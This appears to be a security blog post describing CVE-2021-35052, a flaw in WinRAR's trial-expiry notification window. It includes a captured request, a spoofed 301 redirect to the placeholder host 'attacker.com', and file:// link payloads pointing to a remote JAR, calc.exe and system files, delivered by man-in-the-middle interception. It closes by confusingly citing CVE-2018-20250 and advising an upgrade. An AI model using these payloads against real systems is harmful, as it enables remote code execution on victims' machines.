• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

Exploiting WinRAR vulnerability to spread malicious code on Windows

AnonyViet by AnonyViet
January 25, 2023
in Security
0

This article will describe a vulnerability in the trial version of WinRAR that has serious consequences for third-party software management. This vulnerability allows hackers to intercept and modify requests sent to application users. This vulnerability can be used for remote code execution (RCE) on the victim’s computer. This error is called code CVE-2021-35052.

Join the channel Telegram of the AnonyViet 👉 Link 👈

What is Winrar?

WinRAR is an application that manages files stored on the Windows operating system. It allows creating and decompressing popular archive formats such as RAR and ZIP. It is distributed as trial software, allowing users to experience the full features of the application for a certain number of days. After that, users can continue to use the free apps but have some features disabled.

Result

The author found this vulnerability by accident in WinRAR version 5.70, when the trial period is used up, a Javascript error will appear.

Trial versions of WinRAR are vulnerable: when freeware isn't free

Somewhat surprised because this error only appears in Internet Explorer browser.

After a few tests, it became apparent that when the trial period has expired, about one in three launches of the WinRAR.exe application, will show this message. This window uses the mshtml.dll for Borland C++ included in WinRAR.

Exploiting WinRAR vulnerability to spread malicious code on Windows 10

The author has set up Burp Suite as the default Windows proxy and to analyze outgoing data from the WinRar error window to see if this bug can be exploited. When the request is sent over HTTPS, WinRAR users will receive a notification about the insecure self-signed certificate that Burp uses. However, in my experience, many users will click “Yes” to continue using the application.

Exploiting WinRAR vulnerability to spread malicious code on Windows 11

Looking at this request we can see version (5.7.0) and Winrar x64

GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1
Accept: */*
Accept-Language: ru-RU
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: notifier.rarlab.com 
Connection: close
Cookie: _wr=; _gid=; _ga=

Modify user feedback

Next, the author tried to modify the intercepted responses from WinRAR to the user. If the response code is changed to “301 Moved Permanently” then my redirect request to the malicious domain “attacker.com” will be cached and all requests will be redirected to “attacker. com”.

HTTP/1.1 301 Moved Permanently
content-length: 0
Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64
connection: close

Remote code execution

Attack Man-in-the-Middle This requires ARP spoofing. The author has tried several different attacks to see if this type of access is possible.

<a href="https://anonyviet.com/khai-thac-lo-hong-winrar-de-phat-tan-ma-doc-tren-windows/file://10.0.12.34/applications/test.jar">file://10.0.12.34/applications/test.jar</a><br>
<a href="\.0.12.34/applications/test.jar">\.0.12.34/applications/test.jar</a><br>
<a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br>
<a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br>
<a href="file:///C:\\windows\\system.ini">file:///C:\\windows\\system.ini</a><br>

The above code describes a spoofed response showing several possible attacks, such as running applications, retrieving server information, and opening calculator applications.

Exploiting WinRAR vulnerability to spread malicious code on Windows 12

Exploiting WinRAR vulnerability to spread malicious code on Windows 13

Most attacks are successful, but it should be noted that many attacks still result in additional Windows security warnings. To be successful, users need to click “Run”.

Exploiting WinRAR vulnerability to spread malicious code on Windows 14

However, there are some file types that can run without a security warning. That is:

• .DOCX
• .PDF
• .PY
• .RAR
CVE-2018-20250 exists for Winrar 5.7 and below. Therefore you need to upgrade WinRar now to avoid being attacked by Hackers

One of the biggest challenges a company faces is managing third-party software. Once installed, third-party software has access to read, write, and modify data on devices that access the corporate network.

It is not possible to test every application that a user can install and therefore IT policy is important to avoid security risks.

The article achieved: 5/5 – (100 votes)

Tags: CodeexploitingmaliciousspreadvulnerabilityWindowsWinRAR
Previous Post

Lesson 110: How to automatically sum in Excel

Next Post

How to change the mouse pointer color on Windows 10/11

AnonyViet

AnonyViet

Related Posts

How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Capsolver: Automatic solution solution for business
Security

Capsolver: Automatic solution solution for business

December 12, 2024
Seekr: Collect & manage OSINT data
Security

Seekr: Collect & manage OSINT data

November 22, 2024
Next Post
How to change the mouse pointer color on Windows 10/11

How to change the mouse pointer color on Windows 10/11

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

Discover Supermix – Smart playlist on YouTube Music

Discover Supermix – Smart playlist on YouTube Music

May 20, 2025
The 10 best Torrent websites today – 100% still operate

The 10 best Torrent websites today – 100% still operate

May 20, 2025
Share Code Shop Selling Acc game extremely lightweight written in bootstrap

Share Code Shop Selling Acc game extremely lightweight written in bootstrap

May 19, 2025
Instructions for downloading all photos and story from Instagram

Instructions for downloading all photos and story from Instagram

May 19, 2025
Discover Supermix – Smart playlist on YouTube Music

Discover Supermix – Smart playlist on YouTube Music

May 20, 2025
The 10 best Torrent websites today – 100% still operate

The 10 best Torrent websites today – 100% still operate

May 20, 2025
Share Code Shop Selling Acc game extremely lightweight written in bootstrap

Share Code Shop Selling Acc game extremely lightweight written in bootstrap

May 19, 2025
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

Discover Supermix – Smart playlist on YouTube Music

Discover Supermix – Smart playlist on YouTube Music

May 20, 2025
The 10 best Torrent websites today – 100% still operate

The 10 best Torrent websites today – 100% still operate

May 20, 2025
  • Home
  • Home 2
  • Home 3
  • Home 4
  • Home 5
  • Home 6
  • Next Dest Page
  • Sample Page

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí SHBET bongdaso

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí SHBET bongdaso